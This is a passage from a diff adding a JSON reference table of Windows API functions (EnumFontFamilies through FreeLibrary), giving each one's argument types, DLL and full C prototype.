lpRect);" + }, + { + "function_name": "EnumFontFamiliesA", + "arguments": [ + "HDC", + "LPCTSTR", + "FONTENUMPROC", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumFontFamiliesA(HDC hdc,LPCTSTR lpszFamily,FONTENUMPROC lpEnumFontFamProc, LPARAM lParam);" + }, + { + "function_name": "EnumFontFamiliesW", + "arguments": [ + "HDC", + "PLOGFONTW", + "FONTENUMPROCW", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumFontFamiliesW(HDC hdc,PLOGFONTW lpszFamily,FONTENUMPROCW lpEnumFontFamProc, LPARAM lParam);" + }, + { + "function_name": "EnumFontFamiliesExA", + "arguments": [ + "HDC", + "LPLOGFONT", + "FONTENUMPROC", + "LPARAM", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumFontFamiliesExA(HDC hdc, LPLOGFONT lpLogfont, FONTENUMPROC lpEnumFontFamExProc, LPARAM lParam, DWORD dwFlags);" + }, + { + "function_name": "EnumFontFamiliesExW", + "arguments": [ + "HDC", + "LPLOGFONTW", + "FONTENUMPROCW", + "LPARAM", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumFontFamiliesExW(HDC hdc, LPLOGFONTW lpLogfont, FONTENUMPROCW lpEnumFontFamExProc, LPARAM lParam, DWORD dwFlags);" + }, + { + "function_name": "EnumFontsA", + "arguments": [ + "HDC", + "LPCTSTR", + "FONTENUMPROC", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumFontsA(HDC hdc, LPCTSTR lpFaceName,FONTENUMPROC lpFontFunc,LPARAM lParam);" + }, + { + "function_name": "EnumFontsW", + "arguments": [ + "HDC", + "LPCWSTR", + "FONTENUMPROCW", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumFontsW(HDC hDC, LPCWSTR lpFaceName,FONTENUMPROCW FontFunc,LPARAM lParam);" + }, + { + "function_name": "EnumICMProfilesA", + "arguments": [ + "HDC", + "ICMENUMPROC", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumICMProfilesA(HDC hdc, ICMENUMPROC lpICMEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumICMProfilesW", + "arguments": [ + "HDC", + "ICMENUMPROCW", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumICMProfilesW(HDC hDC, ICMENUMPROCW lpEnumICMProfilesFunc, LPARAM lParam);" + }, + { + "function_name": "EnumJobsA", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "LPBYTE", + "DWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL EnumJobsA( HANDLE hPrinter, DWORD FirstJob, DWORD NoJobs, DWORD Level, LPBYTE pJob, DWORD cbBuf, LPDWORD pcbNeeded, LPDWORD pcReturned );" + }, + { + "function_name": "EnumMetaFile", + "arguments": [ + "HDC", + "HMETAFILE", + "MFENUMPROC", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL EnumMetaFile(HDC hdc, HMETAFILE hmf,MFENUMPROC lpMetaFunc, LPARAM lParam);" + }, + { + "function_name": "EnumObjects", + "arguments": [ + "HDC", + "int", + "GOBJENUMPROC", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EnumObjects(HDC hdc, int nObjectType, GOBJENUMPROC lpObjectFunc,LPARAM lParam);" + }, + { + "function_name": "EnumPortsA", + "arguments": [ + "LPTSTR", + "DWORD", + "LPBYTE", + "DWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL EnumPortsA( LPTSTR pName, DWORD Level, LPBYTE pPorts, DWORD cbBuf, LPDWORD pcbNeeded, LPDWORD pcReturned );" + }, + { + "function_name": "EnumPrintersA", + "arguments": [ + "DWORD", + "LPTSTR", + "DWORD", + "LPBYTE", + "DWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL EnumPrintersA( DWORD Flags, LPTSTR Name, DWORD Level, LPBYTE pPrinterEnum, DWORD cbBuf, LPDWORD pcbNeeded, LPDWORD pcReturned );" + }, + { + "function_name": "EnumPropsA", + "arguments": [ + "HWND", + "PROPENUMPROC" + ], + "dll_name": "user32.dll", + "full_prototype": "int EnumPropsA(HWND hWnd, PROPENUMPROC lpEnumFunc);" + }, + { + "function_name": "EnumPropsExA", + "arguments": [ + "HWND", + "PROPENUMPROCEX", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "int EnumPropsExA(HWND hWnd, PROPENUMPROCEX lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumPropsExW", + "arguments": [ + "HWND", + "PROPENUMPROCEXW", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "int EnumPropsExW(HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumPropsW", + "arguments": [ + "HWND", + "PROPENUMPROCW" + ], + "dll_name": "user32.dll", + "full_prototype": "int EnumPropsW(HWND hWnd, PROPENUMPROCW lpEnumFunc);" + }, + { + "function_name": "EnumResourceLanguagesA", + "arguments": [ + "HMODULE", + "LPCTSTR", + "LPCTSTR", + "ENUMRESLANGPROC", + "LONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumResourceLanguagesA( HMODULE hModule, LPCTSTR lpType, LPCTSTR lpName, ENUMRESLANGPROC lpEnumFunc, LONG lParam );" + }, + { + "function_name": "EnumResourceLanguagesW", + "arguments": [ + "HMODULE", + "LPCWSTR", + "LPCWSTR", + "ENUMRESLANGPROC", + "LONG_PTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumResourceLanguagesW(HMODULE hModule,LPCWSTR lpType,LPCWSTR lpName,ENUMRESLANGPROC lpEnumFunc,LONG_PTR lParam );" + }, + { + "function_name": "EnumResourceNamesA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "ENUMRESNAMEPROC", + "LONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumResourceNamesA( HINSTANCE hModule, LPCTSTR lpszType, ENUMRESNAMEPROC lpEnumFunc, LONG lParam );" + }, + { + "function_name": "EnumResourceNamesW", + "arguments": [ + "HMODULE", + "LPCWSTR", + "ENUMRESNAMEPROC", + "LONG_PTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumResourceNamesW(HMODULE hModule,LPCWSTR lpszType,ENUMRESNAMEPROC lpEnumFunc,LONG_PTR lParam );" + }, + { + "function_name": "EnumResourceTypesA", + "arguments": [ + "HMODULE", + "ENUMRESTYPEPROC", + "LONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumResourceTypesA( HMODULE hModule, ENUMRESTYPEPROC lpEnumFunc, LONG lParam );" + }, + { + "function_name": "EnumResourceTypesW", + "arguments": [ + "HMODULE", + "ENUMRESTYPEPROC", + "", + "LONG_PTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumResourceTypesW(HMODULE hModule,ENUMRESTYPEPROC lpEnumFunc,,LONG_PTR lParam );" + }, + { + "function_name": "EnumSystemCodePagesA", + "arguments": [ + "CODEPAGE_ENUMPROC", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumSystemCodePagesA( CODEPAGE_ENUMPROC lpCodePageEnumProc, DWORD dwFlags );" + }, + { + "function_name": "EnumSystemCodePagesW", + "arguments": [ + "CODEPAGE_ENUMPROCW", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumSystemCodePagesW( CODEPAGE_ENUMPROCW lpfnCodePageEnum, DWORD flags );" + }, + { + "function_name": "EnumSystemLocalesA", + "arguments": [ + "LOCALE_ENUMPROC", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumSystemLocalesA( LOCALE_ENUMPROC lpLocaleEnumProc, DWORD dwFlags );" + }, + { + "function_name": "EnumSystemLocalesW", + "arguments": [ + "LOCALE_ENUMPROCW", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumSystemLocalesW( LOCALE_ENUMPROCW lpfnLocaleEnum, DWORD dwFlags );" + }, + { + "function_name": "EnumTimeFormatsA", + "arguments": [ + "TIMEFMT_ENUMPROC", + "LCID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumTimeFormatsA( TIMEFMT_ENUMPROC lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags );" + }, + { + "function_name": "EnumTimeFormatsW", + "arguments": [ + "TIMEFMT_ENUMPROCW", + "LCID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumTimeFormatsW( TIMEFMT_ENUMPROCW lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);" + }, + { + "function_name": "EnumThreadWindows", + "arguments": [ + "DWORD", + "WNDENUMPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumThreadWindows(DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam);" + }, + { + "function_name": "EnumWindows", + "arguments": [ + "WNDENUMPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumWindowStationsA", + "arguments": [ + "WINSTAENUMPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumWindowStationsA(WINSTAENUMPROC lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumWindowStationsW", + "arguments": [ + "WINSTAENUMPROCW", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumWindowStationsW(WINSTAENUMPROCW EnumFunc, LPARAM Context);" + }, + { + "function_name": "EqualPrefixSid", + "arguments": [ + "PSID", + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL EqualPrefixSid( PSID pSid1, PSID pSid2 );" + }, + { + "function_name": "EqualRect", + "arguments": [ + "CONST RECT", + "CONST RECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EqualRect(CONST RECT *lprc1, CONST RECT *lprc2);" + }, + { + "function_name": "EqualRgn", + "arguments": [ + "HRGN", + "HRGN" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL EqualRgn(HRGN hSrcRgn1, HRGN hSrcRgn2);" + }, + { + "function_name": "EqualSid", + "arguments": [ + "PSID", + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL EqualSid( PSID pSid1, PSID pSid2 );" + }, + { + "function_name": "EraseTape", + "arguments": [ + "HANDLE", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD EraseTape( HANDLE hDevice, DWORD dwEraseType, BOOL bImmediate );" + }, + { + "function_name": "Escape", + "arguments": [ + "HDC", + "int", + "int", + "LPCSTR", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int Escape(HDC hdc, int nEscape, int cbInput, LPCSTR lpvInData, LPVOID lpvOutData);" + }, + { + "function_name": "EscapeCommFunction", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EscapeCommFunction( HANDLE hFile, DWORD dwFunc );" + }, + { + "function_name": "ExcludeClipRect", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int ExcludeClipRect(HDC hdc, int nLeftRect, int nTopRect,int nRightRect,int nBottomRect);" + }, + { + "function_name": "ExcludeUpdateRgn", + "arguments": [ + "HDC", + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "int ExcludeUpdateRgn(HDC hDC, HWND hWnd);" + }, + { + "function_name": "ExitProcess", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID ExitProcess( UINT uExitCode );" + }, + { + "function_name": "ExitThread", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID ExitThread( DWORD dwExitCode );" + }, + { + "function_name": "ExitWindowsEx", + "arguments": [ + "UINT", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ExitWindowsEx(UINT uFlags,DWORD dwReserved);" + }, + { + "function_name": "ExpandEnvironmentStringsA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD ExpandEnvironmentStringsA( LPCTSTR lpSrc, LPTSTR lpDst, DWORD nSize );" + }, + { + "function_name": "ExpandEnvironmentStringsW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD ExpandEnvironmentStringsW( LPCWSTR src, LPWSTR dst, DWORD len );" + }, + { + "function_name": "ExtCreatePen", + "arguments": [ + "DWORD", + "DWORD", + "CONST LOGBRUSH *", + "DWORD", + "CONST DWORD *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HPEN ExtCreatePen(DWORD dwPenStyle, DWORD dwWidth, CONST LOGBRUSH * lplb, DWORD dwStyleCount,CONST DWORD * lpStyle);" + }, + { + "function_name": "ExtCreateRegion", + "arguments": [ + "CONST XFORM *", + "DWORD", + "CONST RGNDATA *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN ExtCreateRegion(CONST XFORM * lpXform, DWORD nCount, CONST RGNDATA * lpRgnData);" + }, + { + "function_name": "ExtEscape", + "arguments": [ + "HDC", + "int", + "int", + "LPCSTR", + "int", + "LPSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int ExtEscape(HDC hdc,int nEscape,int cbInput,LPCSTR lpszInData, int cbOutput, LPSTR lpszOutData);" + }, + { + "function_name": "ExtFloodFill", + "arguments": [ + "HDC", + "int", + "int", + "COLORREF", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ExtFloodFill(HDC hdc,int nXStart,int nYStart,COLORREF crColor, UINT fuFillType);" + }, + { + "function_name": "ExtractAssociatedIconA", + "arguments": [ + "HINSTANCE", + "LPTSTR", + "LPWORD" + ], + "dll_name": "shell32.dll", + "full_prototype": "HICON ExtractAssociatedIconA( HINSTANCE hInst, LPTSTR lpIconPath, LPWORD lpiIcon );" + }, + { + "function_name": "ExtractIconA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "UINT" + ], + "dll_name": "shell32.dll", + "full_prototype": "HICON ExtractIconA(HINSTANCE hInst,LPCTSTR lpszExeFileName,UINT nIconIndex);" + }, + { + "function_name": "ExtractIconExA", + "arguments": [ + "LPCTSTR", + "int", + "HICON", + "HICON", + "UINT" + ], + "dll_name": "shell32.dll", + "full_prototype": "UINT ExtractIconExA(LPCTSTR lpszFile,int nIconIndex,HICON *phiconLarge,HICON *phiconSmall,UINT nIcons);" + }, + { + "function_name": "ExtSelectClipRgn", + "arguments": [ + "HDC", + "HRGN", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int ExtSelectClipRgn(HDC hdc, HRGN hrgn, int fnMode);" + }, + { + "function_name": "ExtTextOutA", + "arguments": [ + "HDC", + "int", + "int", + "UINT", + "CONST RECT", + "LPCTSTR", + "UINT", + "CONST INT *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ExtTextOutA(HDC hdc, int X,int Y, UINT fuOptions, CONST RECT *lprc, LPCTSTR lpString,UINT cbCount, CONST INT * lpDx );" + }, + { + "function_name": "ExtTextOutW", + "arguments": [ + "HDC", + "INT", + "INT", + "UINT", + "const RECT*", + "LPCWSTR", + "UINT", + "const INT*" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ExtTextOutW(HDC hdc, INT x, INT y, UINT flags, const RECT* lprect, LPCWSTR str, UINT count, const INT* lpDx);" + }, + { + "function_name": "FatalAppExitA", + "arguments": [ + "UINT", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID FatalAppExitA(UINT uAction,LPCTSTR lpMessageText);" + }, + { + "function_name": "FatalAppExitW", + "arguments": [ + "UINT", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "void FatalAppExitW(UINT uAction,LPCWSTR lpMessageText);" + }, + { + "function_name": "FatalExit", + "arguments": [ + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID FatalExit( int ExitCode );" + }, + { + "function_name": "FileTimeToDosDateTime", + "arguments": [ + "CONST FILETIME *", + "LPWORD", + "LPWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FileTimeToDosDateTime( CONST FILETIME * lpFileTime, LPWORD lpFatDate, LPWORD lpFatTime );" + }, + { + "function_name": "FileTimeToLocalFileTime", + "arguments": [ + "CONST FILETIME *", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FileTimeToLocalFileTime( CONST FILETIME * lpFileTime, LPFILETIME lpLocalFileTime );" + }, + { + "function_name": "FileTimeToSystemTime", + "arguments": [ + "CONST FILETIME *", + "LPSYSTEMTIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FileTimeToSystemTime( CONST FILETIME * lpFileTime, LPSYSTEMTIME lpSystemTime );" + }, + { + "function_name": "FillConsoleOutputAttribute", + "arguments": [ + "HANDLE", + "WORD", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FillConsoleOutputAttribute( HANDLE hConsoleOutput, WORD wAttribute, DWORD nLength, COORD dwWriteCoord, LPDWORD lpNumberOfAttrsWritten );" + }, + { + "function_name": "FillConsoleOutputCharacterA", + "arguments": [ + "HANDLE", + "TCHAR", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FillConsoleOutputCharacterA( HANDLE hConsoleOutput, TCHAR cCharacter, DWORD nLength, COORD dwWriteCoord, LPDWORD lpNumberOfCharsWritten );" + }, + { + "function_name": "FillConsoleOutputCharacterW", + "arguments": [ + "HANDLE", + "WCHAR", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FillConsoleOutputCharacterW( HANDLE hConsoleOutput, WCHAR ch, DWORD length, COORD coord, LPDWORD lpNumCharsWritten );" + }, + { + "function_name": "FillPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL FillPath(HDC hdc);" + }, + { + "function_name": "FillRect", + "arguments": [ + "HDC", + "CONST RECT", + "HBRUSH" + ], + "dll_name": "user32.dll", + "full_prototype": "int FillRect(HDC hDC, CONST RECT *lprc, HBRUSH hbr);" + }, + { + "function_name": "FillRgn", + "arguments": [ + "HDC", + "HRGN", + "HBRUSH" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL FillRgn(HDC hdc, HRGN hrgn, HBRUSH hbr);" + }, + { + "function_name": "FindAtomA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM FindAtomA( LPCTSTR lpString );" + }, + { + "function_name": "FindAtomW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM FindAtomW( LPCWSTR str );" + }, + { + "function_name": "FindClose", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FindClose(HANDLE hFindFile);" + }, + { + "function_name": "FindCloseChangeNotification", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FindCloseChangeNotification(HANDLE hChangeHandle);" + }, + { + "function_name": "FindExecutableA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPTSTR" + ], + "dll_name": "shell32.dll", + "full_prototype": "HINSTANCE FindExecutableA(LPCTSTR lpFile,LPCTSTR lpDirectory,LPTSTR lpResult);" + }, + { + "function_name": "FindFirstChangeNotificationA", + "arguments": [ + "LPCTSTR", + "BOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstChangeNotificationA( LPCTSTR lpPathName, BOOL bWatchSubtree, DWORD dwNotifyFilter );" + }, + { + "function_name": "FindFirstChangeNotificationW", + "arguments": [ + "LPCWSTR", + "BOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstChangeNotificationW(LPCWSTR lpPathName, BOOL bWatchSubtree, DWORD dwNotifyFilter);" + }, + { + "function_name": "FindFirstChangeNotification", + "arguments": [ + "LPCTSTR", + "BOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstChangeNotification( LPCTSTR lpPathName, BOOL bWatchSubtree, DWORD dwNotifyFilter);" + }, + { + "function_name": "FindFirstFileA", + "arguments": [ + "LPCTSTR", + "LPWIN32_FIND_DATA" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstFileA(LPCTSTR lpFileName,LPWIN32_FIND_DATA lpFindFileData);" + }, + { + "function_name": "FindFirstFileExA", + "arguments": [ + "LPCSTR", + "FINDEX_INFO_LEVELS", + "PVOID", + "FINDEX_SEARCH_OPS", + "PVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstFileExA(LPCSTR lpFileName,FINDEX_INFO_LEVELS fInfoLevelId,PVOID lpFindFileData,FINDEX_SEARCH_OPS fSearchOp,PVOID lpSearchFilter,DWORD dwAdditionalFlags);" + }, + { + "function_name": "FindFirstFileExW", + "arguments": [ + "LPCWSTR", + "FINDEX_INFO_LEVELS", + "PVOID", + "FINDEX_SEARCH_OPS", + "PVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstFileExW(LPCWSTR lpFileName,FINDEX_INFO_LEVELS fInfoLevelId,PVOID lpFindFileData,FINDEX_SEARCH_OPS fSearchOp,PVOID lpSearchFilter,DWORD dwAdditionalFlags);" + }, + { + "function_name": "FindFirstFileW", + "arguments": [ + "LPCWSTR", + "LPWIN32_FIND_DATAW" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE FindFirstFileW(LPCWSTR lpFileName,LPWIN32_FIND_DATAW lpFindFileData);" + }, + { + "function_name": "FindFirstFreeAce", + "arguments": [ + "PACL", + "LPVOID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL FindFirstFreeAce( PACL pAcl, LPVOID *pAce );" + }, + { + "function_name": "FindNextChangeNotification", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FindNextChangeNotification(HANDLE hChangeHandle);" + }, + { + "function_name": "FindNextFileA", + "arguments": [ + "HANDLE", + "LPWIN32_FIND_DATA" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FindNextFileA(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData);" + }, + { + "function_name": "FindNextFileW", + "arguments": [ + "HANDLE", + "LPWIN32_FIND_DATAW" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATAW lpFindFileData);" + }, + { + "function_name": "FindResourceA", + "arguments": [ + "HMODULE", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HRSRC FindResourceA( HMODULE hModule, LPCTSTR lpName, LPCTSTR lpType );" + }, + { + "function_name": "FindResourceW", + "arguments": [ + "HINSTANCE", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HRSRC FindResourceW(HINSTANCE hModule,LPCWSTR lpName,LPCWSTR lpType );" + }, + { + "function_name": "FindResourceExA", + "arguments": [ + "HMODULE", + "LPCTSTR", + "LPCTSTR", + "WORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HRSRC FindResourceExA( HMODULE hModule, LPCTSTR lpType, LPCTSTR lpName, WORD wLanguage );" + }, + { + "function_name": "FindResourceExW", + "arguments": [ + "HINSTANCE", + "LPCWSTR", + "LPCWSTR", + "WORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HRSRC FindResourceExW(HINSTANCE hModule,LPCWSTR lpType,LPCWSTR lpName,WORD wLanguage );" + }, + { + "function_name": "FindWindowA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND FindWindowA(LPCTSTR lpClassName, LPCTSTR lpWindowName);" + }, + { + "function_name": "FindWindowExA", + "arguments": [ + "HWND", + "HWND", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND FindWindowExA(HWND hwndParent,HWND hwndChildAfter,LPCTSTR lpszClass,LPCTSTR lpszWindow);" + }, + { + "function_name": "FindWindowExW", + "arguments": [ + "HWND", + "HWND", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND FindWindowExW(HWND hwndParent,HWND hwndChildAfter, LPCWSTR lpszClass, LPCWSTR lpszWindow);" + }, + { + "function_name": "FindWindowW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND FindWindowW(LPCWSTR lpClassName, LPCWSTR lpWindowName);" + }, + { + "function_name": "FlashWindow", + "arguments": [ + "HWND", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL FlashWindow(HWND hWnd,BOOL bInvert);" + }, + { + "function_name": "FlashWindowEx", + "arguments": [ + "PFLASHWINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL FlashWindowEx(PFLASHWINFO pfwi);" + }, + { + "function_name": "FlattenPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL FlattenPath(HDC hdc);" + }, + { + "function_name": "FloodFill", + "arguments": [ + "HDC", + "int", + "int", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL FloodFill(HDC hdc, int nXStart, int nYStart, COLORREF crFill);" + }, + { + "function_name": "FlushConsoleInputBuffer", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FlushConsoleInputBuffer( HANDLE hConsoleInput );" + }, + { + "function_name": "FlushFileBuffers", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FlushFileBuffers( HANDLE hFile );" + }, + { + "function_name": "FlushInstructionCache", + "arguments": [ + "HANDLE", + "LPCVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FlushInstructionCache( HANDLE hProcess, LPCVOID lpBaseAddress, DWORD dwSize );" + }, + { + "function_name": "FlushViewOfFile", + "arguments": [ + "LPCVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FlushViewOfFile( LPCVOID lpBaseAddress, DWORD dwNumberOfBytesToFlush );" + }, + { + "function_name": "FoldStringA", + "arguments": [ + "DWORD", + "LPCTSTR", + "int", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int FoldStringA( DWORD dwMapFlags, LPCTSTR lpSrcStr, int cchSrc, LPTSTR lpDestStr, int cchDest );" + }, + { + "function_name": "FoldStringW", + "arguments": [ + "DWORD", + "LPCWSTR", + "INT", + "LPWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "INT FoldStringW( DWORD dwFlags, LPCWSTR src, INT srclen, LPWSTR dst, INT dstlen );" + }, + { + "function_name": "FormatMessageA", + "arguments": [ + "DWORD", + "LPCVOID", + "DWORD", + "DWORD", + "LPTSTR", + "DWORD", + "va_list *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD FormatMessageA( DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPTSTR lpBuffer, DWORD nSize, va_list * Arguments );" + }, + { + "function_name": "FormatMessageW", + "arguments": [ + "DWORD", + "PCVOID", + "DWORD", + "DWORD", + "LPWSTR", + "DWORD", + "va_list *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD FormatMessageW(DWORD dwFlags,PCVOID lpSource,DWORD dwMessageId,DWORD dwLanguageId,LPWSTR lpBuffer,DWORD nSize,va_list * Arguments);" + }, + { + "function_name": "FrameRect", + "arguments": [ + "HDC", + "CONST RECT *", + "HBRUSH" + ], + "dll_name": "user32.dll", + "full_prototype": "int FrameRect(HDC hDC,CONST RECT * lprc, HBRUSH hbr);" + }, + { + "function_name": "FrameRgn", + "arguments": [ + "HDC", + "HRGN", + "HBRUSH", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL FrameRgn(HDC hdc,HRGN hrgn, HBRUSH hbr, int nWidth,int nHeight);" + }, + { + "function_name": "FreeConsole", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FreeConsole(VOID);" + }, + { + "function_name": "FreeDDElParam", + "arguments": [ + "UINT", + "LONG" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL FreeDDElParam(UINT msg, LONG lParam);" + }, + { + "function_name": "FreeEnvironmentStringsA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FreeEnvironmentStringsA( LPTSTR lpszEnvironmentBlock );" + }, + { + "function_name": "FreeEnvironmentStringsW", + "arguments": [ + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL FreeEnvironmentStringsW(LPWSTR lpszEnvironmentBlock);" + }, + { + "function_name": "FreeLibrary", + "arguments": [ + "HMODULE" + ], + "dll_name": 